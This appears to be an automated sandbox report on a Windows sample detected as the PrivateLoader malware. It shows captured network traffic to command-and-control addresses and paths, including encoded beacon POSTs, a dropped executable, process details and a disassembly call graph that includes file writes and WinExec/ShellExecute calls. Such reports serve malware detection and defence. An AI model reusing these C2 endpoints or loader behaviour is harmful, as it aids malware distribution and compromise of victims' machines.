                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: 212.193.30.45


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549723212.193.30.29803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:27:15.124949932 CEST202OUTGET /server.txt HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: 212.193.30.29


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549725172.67.133.215803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:27:38.060959101 CEST207OUTGET /api/setStats.php HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: wfsdragon.ru
                                              Jul 24, 2024 17:27:38.895979881 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Wed, 24 Jul 2024 15:27:38 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HEB0ODgbQzdwXbrO%2Fmpcx54rLT3TkSjyztoRT9GMG4OZ5uvC42Wh%2FHFnkCtG3M1maOMLwGfOWQirUg6Hnn8v1vkJfbpuzpi%2F3vDyLzjPstrI%2FskReRpENmzfzUQepU%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a84ef7a1d151a30-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 34 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 [TRUNCATED]
                                              Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8a84ef7a1d151a30',t:'MTcyMTgzNDg1OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.create
                                              Jul 24, 2024 17:27:38.896150112 CEST499INData Raw: 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61
                                              Data Ascii: Element('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListen


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549726212.193.30.21803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:27:38.920288086 CEST287OUTPOST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                              Jul 24, 2024 17:27:38.920495987 CEST25OUTData Raw: 64 61 74 61 3d 6d 37 6d 6f 69 72 6d 75 72 37 57 7a 73 71 44 73 38 75 51 3d
                                              Data Ascii: data=m7moirmur7WzsqDs8uQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549729212.193.30.21803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:28:00.345628023 CEST287OUTPOST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                              Jul 24, 2024 17:28:00.345663071 CEST25OUTData Raw: 64 61 74 61 3d 52 32 56 30 56 6d 56 79 63 32 6c 76 62 6e 77 77 4c 6a 67 3d
                                              Data Ascii: data=R2V0VmVyc2lvbnwwLjg=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549730212.193.30.21803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:28:21.837099075 CEST287OUTPOST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                              Jul 24, 2024 17:28:21.837116957 CEST25OUTData Raw: 64 61 74 61 3d 6d 37 6d 6f 69 72 6d 75 72 37 57 7a 73 71 44 73 38 75 51 3d
                                              Data Ascii: data=m7moirmur7WzsqDs8uQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549731212.193.30.21803792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 24, 2024 17:28:43.238810062 CEST287OUTPOST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                              Jul 24, 2024 17:28:43.238838911 CEST25OUTData Raw: 64 61 74 61 3d 52 32 56 30 56 6d 56 79 63 32 6c 76 62 6e 77 77 4c 6a 67 3d
                                              Data Ascii: data=R2V0VmVyc2lvbnwwLjg=


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549704149.154.167.994433792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-24 15:26:52 UTC191OUTGET / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: telegram.org
                                              2024-07-24 15:26:52 UTC448INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Wed, 24 Jul 2024 15:26:52 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 19541
                                              Connection: close
                                              Set-Cookie: stel_ssid=dd3949a2cafe5c78e4_15718661345566907739; expires=Thu, 25 Jul 2024 02:33:32 GMT; path=/; samesite=None; secure; HttpOnly
                                              Pragma: no-cache
                                              Cache-control: no-store
                                              X-Frame-Options: SAMEORIGIN
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              2024-07-24 15:26:52 UTC15936INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 20 4d 65 73 73 65 6e 67 65 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 20 e2 80 93 20 61 20 6e 65 77 20 65 72 61 20 6f 66 20 6d 65 73 73 61 67 69 6e 67
                                              Data Ascii: <!DOCTYPE html><html class=""> <head> <meta charset="utf-8"> <title>Telegram Messenger</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="Telegram a new era of messaging
                                              2024-07-24 15:26:52 UTC3605INData Raw: 72 20 61 74 74 61 63 6b 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6c 5f 6d 61 69 6e 5f 63 61 72 64 5f 63 65 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6c 5f 6d 61 69 6e 5f 63 61 72 64 5f 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 70 69 63 74 75 72 65 20 63 6c 61 73 73 3d 22 64 65 76 5f 70 61 67 65 5f 74 67 73 74 69 63 6b 65 72 20 74 6c 5f 6d 61 69 6e 5f 63 61 72 64 5f 61 6e 69 6d 61 74 65 64 20 6a 73 2d 74 67 73 74 69 63 6b 65 72 5f 69 6d 61 67 65 22 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 6f 75 72 63 65 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 74 67 73 74 69 63 6b 65 72 22 20 73 72 63 73
                                              Data Ascii: r attacks.</div> </div> </div> <div class="tl_main_card_cell"> <div class="tl_main_card_wrap"> <picture class="dev_page_tgsticker tl_main_card_animated js-tgsticker_image"><div></div><source type="application/x-tgsticker" srcs


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549724104.20.4.2354433792C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-24 15:27:37 UTC203OUTGET /raw/A7dSG1te HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: pastebin.com
                                              2024-07-24 15:27:37 UTC436INHTTP/1.1 404 Not Found
                                              Date: Wed, 24 Jul 2024 15:27:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-frame-options: DENY
                                              x-frame-options: DENY
                                              x-content-type-options: nosniff
                                              x-content-type-options: nosniff
                                              x-xss-protection: 1;mode=block
                                              x-xss-protection: 1;mode=block
                                              cache-control: public, max-age=1801
                                              CF-Cache-Status: MISS
                                              Server: cloudflare
                                              CF-RAY: 8a84ef70ddba72ab-EWR
                                              2024-07-24 15:27:37 UTC698INData Raw: 32 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                              Data Ascii: 2b3<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                              2024-07-24 15:27:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:26:49
                                              Start date:24/07/2024
                                              Path:C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe"
                                              Imagebase:0x310000
                                              File size:411'648 bytes
                                              MD5 hash:5AE2C7E495880D7E209A41158FD72984
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:1
                                              Start time:11:26:49
                                              Start date:24/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                              Imagebase:0x610000
                                              File size:15'872 bytes
                                              MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 92%, ReversingLabs
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:11:26:55
                                              Start date:24/07/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
                                              Imagebase:0x30000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:4.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:59.7%
                                                Total number of Nodes:857
                                                Total number of Limit Nodes:14
                                                execution_graph 25718 374000 25720 374044 GetPEB 25718->25720 25721 374077 CreateFileA 25720->25721 25723 374265 25721->25723 25725 37422d 25721->25725 25724 374246 WriteFile 25727 374255 FindCloseChangeNotification WinExec 25724->25727 25725->25724 25726 374244 25725->25726 25726->25727 25727->25723 25728 351fe9 25731 3543f6 25728->25731 25730 352001 25732 354401 RtlFreeHeap 25731->25732 25733 35442a __dosmaperr 25731->25733 25732->25733 25734 354416 25732->25734 25733->25730 25737 350cb8 14 API calls __dosmaperr 25734->25737 25736 35441c GetLastError 25736->25733 25737->25736 25738 3498d9 25739 3498e5 __FrameHandler3::FrameUnwindToState 25738->25739 25768 3495fa 25739->25768 25741 3498ec 25742 349a3f 25741->25742 25752 349916 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 25741->25752 25974 349c79 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 25742->25974 25744 349a46 25975 352731 23 API calls _unexpected 25744->25975 25746 349a4c 25976 3526f5 23 API calls _unexpected 25746->25976 25748 349a54 25977 349f2e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 25748->25977 25749 349935 25751 349a5a __scrt_common_main_seh 25752->25749 25759 3499b6 25752->25759 25970 35270b 34 API calls 3 library calls 25752->25970 25776 349d93 25759->25776 25762 3499d8 25762->25744 25763 3499dc 25762->25763 25764 3499e5 25763->25764 25972 3526e6 23 API calls _unexpected 25763->25972 25973 34976b 70 API calls ___scrt_uninitialize_crt 25764->25973 25767 3499ed 25767->25749 25769 349603 25768->25769 25978 349a99 IsProcessorFeaturePresent 25769->25978 25771 34960f 25979 34aa37 10 API calls 2 library calls 25771->25979 25773 349614 25774 349618 25773->25774 25980 34aa56 7 API calls 2 library calls 25773->25980 25774->25741 25981 34ac10 25776->25981 25778 349da6 GetStartupInfoW 25779 3499bc 25778->25779 25780 353153 25779->25780 25982 357cf2 25780->25982 25782 3499c4 25785 3219b0 25782->25785 25784 35315c 25784->25782 25988 357f97 34 API calls 25784->25988 25786 3219d0 __wsopen_s 25785->25786 25991 351f09 GetSystemTimeAsFileTime 25786->25991 25788 3219e3 25993 34cf64 25788->25993 25791 324ca2 26383 349348 25791->26383 25793 324cb0 25971 349dcc GetModuleHandleW 25793->25971 25795 321c6f 25795->25791 25796 321daf 25795->25796 25800 321c8c __aulldiv 25795->25800 25996 31acd0 25795->25996 26015 315ba0 25796->26015 25798 321dbb 26242 327080 25798->26242 25802 321d85 Sleep 25800->25802 25802->25795 25806 321f2a ___scrt_fastfail 25807 321f40 GetModuleFileNameA 25806->25807 26342 34ac10 25807->26342 25809 321f6a GetUserNameA 26343 3203e0 31 API calls 2 library calls 25809->26343 25811 321f99 26344 327220 27 API calls 2 library calls 25811->26344 25813 3220e7 26345 313230 68 API calls 2 library calls 25813->26345 25815 3220ef 25816 3222cf operator!= 25815->25816 26346 327220 27 API calls 2 library calls 25815->26346 25818 322f5a 25816->25818 25819 3222ee 25816->25819 25821 311810 27 API calls 25818->25821 26351 311810 25819->26351 25822 322f6c operator!= 25821->25822 25830 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25822->25830 25823 322243 DeleteFileA 26347 311a20 25823->26347 25827 325560 27 API calls 25828 322448 25827->25828 25829 31b1f0 56 API calls 25828->25829 25859 322454 __aulldiv 25829->25859 25831 322f8d 25830->25831 25832 322f58 25831->25832 25833 311810 27 API calls 25831->25833 25834 323da3 25832->25834 26370 313ed0 64 API calls 3 library calls 25832->26370 25835 322faf 25833->25835 25836 311810 27 API calls 25834->25836 26369 320a20 89 API calls 3 library calls 25835->26369 25839 3241e3 25836->25839 26378 3271a0 27 API calls 25839->26378 25840 322fdc 25842 325560 27 API calls 25840->25842 25844 322ff6 25842->25844 25843 3243f6 25846 327340 27 API calls 25843->25846 26371 31c450 56 API calls 6 library calls 25844->26371 25848 324420 25846->25848 25847 323002 25849 327080 27 API calls 25847->25849 26379 327400 27 API calls 25848->26379 25852 323283 25849->25852 25851 324430 25853 327340 27 API calls 25851->25853 25854 327340 27 API calls 25852->25854 25855 324453 25853->25855 25856 3232b8 25854->25856 25857 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25855->25857 26372 327400 27 API calls 25856->26372 25860 324461 25857->25860 25869 322873 _strstr 25859->25869 26355 311c20 25859->26355 25863 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25860->25863 25861 3232c2 25864 325560 27 API calls 25861->25864 25865 32446c 25863->25865 25866 3232d9 25864->25866 25867 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25865->25867 25868 31b1f0 56 API calls 25866->25868 25870 324477 25867->25870 25871 3232e5 25868->25871 26359 3137b0 39 API calls 2 library calls 25869->26359 25872 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25870->25872 25873 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25871->25873 25882 324482 WinExec 25872->25882 25875 3232f3 25873->25875 25878 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25875->25878 25876 322bbe 26360 313560 28 API calls 2 library calls 25876->26360 25921 3232fe _strstr 25878->25921 25879 322cef 26361 327340 25879->26361 25883 324c71 25882->25883 25884 32450b 25882->25884 26382 3202c0 6 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 25883->26382 25886 311810 27 API calls 25884->25886 25885 322d0f 26365 327440 27 API calls 25885->26365 25889 32494b 25886->25889 26380 3271a0 27 API calls 25889->26380 25890 322d32 25893 327340 27 API calls 25890->25893 25891 324c6f 25894 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25891->25894 25896 322d55 25893->25896 25897 324c81 25894->25897 25895 324b5e 25898 327340 27 API calls 25895->25898 25899 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25896->25899 25900 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25897->25900 25902 324b88 25898->25902 25903 322d63 25899->25903 25901 324c8c 25900->25901 25904 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25901->25904 26381 327400 27 API calls 25902->26381 25906 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25903->25906 25907 324c97 25904->25907 25910 322d6e 25906->25910 25911 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25907->25911 25908 324b98 25913 327340 27 API calls 25908->25913 25909 323d82 25912 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25909->25912 25914 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25910->25914 25911->25791 25915 323d8d 25912->25915 25916 324bbb 25913->25916 25917 322d79 25914->25917 25918 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25915->25918 25919 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25916->25919 25920 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25917->25920 25922 323d98 25918->25922 25923 324bc9 25919->25923 25924 322d84 25920->25924 25921->25909 26373 3137b0 39 API calls 2 library calls 25921->26373 25926 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25922->25926 25927 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25923->25927 26366 343c20 15 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 25924->26366 25926->25834 25928 324bd4 25927->25928 25930 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25928->25930 25931 324bdf 25930->25931 25933 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25931->25933 25932 323843 26374 313560 28 API calls 2 library calls 25932->26374 25939 324bea WinExec 25933->25939 25935 323974 25936 327340 27 API calls 25935->25936 25937 323994 25936->25937 26375 327440 27 API calls 25937->26375 25941 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25939->25941 25941->25891 25942 3239b7 25943 327340 27 API calls 25942->25943 25944 3239da 25943->25944 25945 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25944->25945 25947 3239e8 25945->25947 25946 322d90 26367 3432c0 84 API calls 2 library calls 25946->26367 25948 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25947->25948 25950 3239f3 25948->25950 25952 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25950->25952 25951 322f19 25953 322f3f 25951->25953 25955 325560 27 API calls 25951->25955 25954 3239fe 25952->25954 25956 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25953->25956 25957 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25954->25957 25958 322f3a 25955->25958 25959 322f4d 25956->25959 25960 323a09 25957->25960 26368 320a20 89 API calls 3 library calls 25958->26368 25962 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25959->25962 26376 343c20 15 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 25960->26376 25962->25832 25964 323a15 26377 3432c0 84 API calls 2 library calls 25964->26377 25966 323d77 25967 311a20 Concurrency::cancellation_token_source::~cancellation_token_source 11 API calls 25966->25967 25967->25909 25968 323b9e 25968->25966 25969 323c2f ShellExecuteA 25968->25969 25969->25966 25970->25759 25971->25762 25972->25764 25973->25767 25974->25744 25975->25746 25976->25748 25977->25751 25978->25771 25979->25773 25980->25774 25981->25778 25983 357cfb 25982->25983 25987 357d2d 25982->25987 25989 353b58 34 API calls 3 library calls 25983->25989 25985 357d1e 25990 357b3e 44 API calls 4 library calls 25985->25990 25987->25784 25988->25784 25989->25985 25990->25987 25992 351f3b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25991->25992 25992->25788 26390 353a9b GetLastError 25993->26390 25997 311810 27 API calls 25996->25997 25998 31ae0f 25997->25998 26427 31aa00 25998->26427 26001 31b1ad 26004 349348 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 26001->26004 26002 311810 27 API calls 26003 31af40 26002->26003 26005 31aa00 55 API calls 26003->26005 26006 31b1e8 26004->26006 26007 31af45 26005->26007 26006->25795 26007->26001 26008 311810 27 API calls 26007->26008 26009 31b06e 26008->26009 26010 31aa00 55 API calls 26009->26010 26011 31b073 26010->26011 26011->26001 26012 311810 27 API calls 26011->26012 26013 31b1a8 26012->26013 26014 31aa00 55 API calls 26013->26014 26014->26001 26016 315bcf __wsopen_s 26015->26016 26017 311810 27 API calls 26016->26017 26018 315bff 26017->26018 26019 349554 _Allocate 16 API calls 26018->26019 26020 315c10 26019->26020 26021 315c26 ___scrt_fastfail 26020->26021 26024 315c4f __aulldiv 26020->26024 26697 33d8c0 53 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 26021->26697 26023 315c47 26023->26024 26025 324ef0 27 API calls 26024->26025 26026 315d91 26025->26026 26027 311810 27 API calls 26026->26027 26028 315db0 26027->26028 26029 311810 27 API calls 26028->26029 26030 316065 26029->26030 26031 33f8b0 28 API calls 26030->26031 26044 316082 __aulldiv 26031->26044 26032 317aef 26033 311810 27 API calls 26032->26033 26034 317aff 26033->26034 26035 349554 _Allocate 16 API calls 26034->26035 26036 317b0d 26035->26036 26037 317b23 ___scrt_fastfail 26036->26037 26038 317b4c 26036->26038 26710 33d8c0 